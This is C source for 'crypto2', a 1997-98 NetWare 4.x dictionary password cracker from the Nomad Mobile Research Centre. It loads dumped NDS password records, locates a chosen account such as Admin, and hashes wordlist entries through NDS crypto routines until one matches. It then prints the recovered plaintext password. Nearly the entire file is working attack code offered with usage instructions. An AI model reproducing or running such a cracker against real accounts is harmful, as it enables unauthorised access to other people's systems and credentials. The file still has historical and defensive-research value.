/*************************************************************************
 *                                                                       *
 * crypto2.c  - cracks one way encrypted passwords from NDS              *
 *                                                                       *
 * Programmer - Simple Nomad - Nomad Mobile Research Centre              *
 *              Crypto routines by itsme@xs4all.nl                       *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/6/97     - Initial Revision                                         *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/13/97    - Completed basic program.                                 *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/26/97    - Redid dictionary attack. Cleaned up code.                *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/28/97    - Minor bug fixes.                                         *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/29/97    - Fixed problem with Windows 95 and added big endian       *
 *              support.                                                 *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 7/01/97    - Added -v switch to allow a visual clue the program has   *
 *              not hung.                                                *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 2/10/98    - Added some of the Lackner changes and Jitsu-Disk's       *
 *              changes. Also added the header file support.             *
 *                                                                       *
 *************************************************************************/

/*
 * Includes
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "globals.h"
#include "password.h"
#include "crypto.h"

#define MAXCHAR 128

PASSWORD pPassword;

const int flip[4]={47,45,92,124};

#ifdef ENDIAN
union
{
  uint32 longData;
  uint8 shortData[4];
} output;

union
{
  uint32 longData;
  uint8 shortData[4];
} input;
#endif

/*
 * This routine switches byte ordering to get around the big 
 * endian -- little endian problem. I did this because systems
 * like AIX offer no solutions for a big endian reading a little
 * endian created file. Send it a uint32 and it returns the 
 * converted uint32.
 */
#ifdef ENDIAN
uint32 make_conversion(uint32 k) {
  int i;
  uint32 j;
  
  input.longData=k;
  for (i=0; i<4; i++)
    output.shortData[i]=input.shortData[3-i];
  return(output.longData);
}
#endif

/*
 * This routine counts the number of PASSWORD.NDS records and returns the
 * value.
 */
long int countPasswordRecords(void)
{
   FILE *fPassword;
   long int j;
   uint32 k;
   ldiv_t calc;

   fPassword=fopen("PASSWORD.NDS","rb");
   if (fPassword==NULL)
   {
     printf("Unable to open PASSWORD.NDS\n");
     exit(1);
   }
   fseek(fPassword,334,SEEK_END);
   k=ftell(fPassword);
   calc=ldiv(k,334);
   j=calc.quot;
   fclose(fPassword);
   return(j);
}

/*
 * print usage if needed
 */
void printHelp(int j)
{
   printf("USAGE: crypto2 <options>\n");
   printf("  -h            This HELP screen\n");
   printf("  -w <filename> Use this WORDLIST.\n");
   printf("  -u <username> Attack the USER specified.\n");
   printf("  -v            VERBOSE to show progress.\n\n");
   printf("EXAMPLE:\n");
   printf("  crypto2 -u Admin -w biglist.wrd\n\n");
   exit(j);
}

/*
 * This routine looks for a particular user. It is passed the total number
 * of users to look through and who to look for. If found, TRUE is returned.
 * FALSE is returned if the user was not found.
 */
int findEntryInPasswordFile(long int j, char *account)
{
   FILE *fPassword;
   int i,k,FOUND=FALSE;
   
   fPassword=fopen("PASSWORD.NDS","rb");
   if (fPassword==NULL)
   {
     printf("Unable to open PASSWORD.NDS\n");
     exit(1);
   }

   while(j!=0)
   {
     fread(&pPassword,334,1,fPassword);
     FOUND=TRUE;
     for (i=0;i<strlen(account);i++)
     {
       k=i*2+6;
       if (account[i]!=pPassword.userCN[k]) FOUND=FALSE;
     }
     if (FOUND==TRUE)
       break;
#ifdef ENDIAN
     pPassword.objectID=make_conversion(pPassword.objectID);
#endif
     j--;
   }
   fclose(fPassword);
   return(FOUND);
}

/*
 * Main prog...
 */
void main(int argc, char *argv[])
{
   FILE *dict;
   int i,turns,FOUND,verbose,counter;
   long int j;
   uint8 buf[32];
   uint32 id;
   uint8 idtab[4];
   uint8 dstpw[16];
   char *wordlist,*account,*words;

   account = (char *)calloc(1,sizeof(char)*MAXCHAR);
   wordlist = (char *)calloc(1,sizeof(char)*MAXCHAR);
   words = (char *)calloc(1,sizeof(char)*MAXCHAR);

   /* say hello... */
   printf("CRYPTO2 - Netware 4.x dictionary password cracker\n");
   printf("Comments/bugs: pandora@nmrc.org\n");
   printf("http://www.nmrc.org/pandora\n");
   printf("1997,1998 (c) Nomad Mobile Research Centre\n\n");

   if (argc<2) printHelp(1);

   /* process command line */
   for (i=1 ; i<argc ; i++)
   {
      if (argv[i][0]=='-')
	 switch(argv[i][1])
	 {
	    case 'w':
	    case 'W':
               if ((i+1>argc) || argv[i+1][0]=='-' || argv[i+1]==NULL)
	       {
		  printf("No argument given for option -w\n");
		  printHelp(-1);
	       }
	       sprintf(wordlist,"%s",argv[i+1]);
	       break;
	    case 'u':
	    case 'U':
	       if ((i+1>argc) || argv[i+1][0]=='-')
	       {
		  printf("No argument given for option -u\n");
		  printHelp(-1);
	       }
	       sprintf(account,"%s",argv[i+1]);
	       break;
	    case 'v':
	    case 'V':
	       verbose=TRUE;
	       break;
            case 'h':
            case 'H':
            case '?':
               printHelp(0);
	    default:
	       printf("Invalid option: %s\n", argv[i]);
	       printHelp(-1);
	 }
   }

   j=countPasswordRecords();
   FOUND=findEntryInPasswordFile(j,account);
   if (FOUND==FALSE)
   {
     printf("%s not found in password file.\n",account);
     exit(1);
   }
   FOUND=FALSE;
   counter=0;

   /* open the dictionary */
   dict=fopen(wordlist, "r");
   if (dict==NULL)
   {
     printf("Unable to open %s\n",wordlist);
     exit(1);
   }

   /* initialize */
   id=pPassword.objectID;


   /* the crack loop -- break out if done or the password found */
   while (!feof(dict))
   {
     fgets(words, 80, dict);
     /* subtract the length of the carriage return and check the
	length of the dictionary word. Since we know what the
	unencrypted length is, skip the word if it's not the right
	length to save time */
     if (strlen(words)-1==pPassword.pwlen)
     {
       for (i=0;i<pPassword.pwlen;i++)
	 words[i]=toupper(words[i]); /* convert lower case letters
					to upper case letters */
       if (verbose==TRUE)
       {
	 counter++;
	 if (counter==4) counter=0;
	 putchar(flip[counter]);
	 printf("\b");
       }
       turns=preparepw(words,pPassword.pwlen,buf);
       xorwithid(id,(uint32 *)buf);
       i=0; do {crypt2data[i]=buf[i];i++;} while (i<32);
       if (encryptp()) 
       {
         FOUND=TRUE;
         break;
       }
     }
   };

   if (dict) fclose(dict);

   /* print it if we found it, otherwise give the bad news */
   if (FOUND==TRUE)
     printf("%s's password is %s\n",account,words);
   else
     printf("%s's password not found.\n",account);
} 
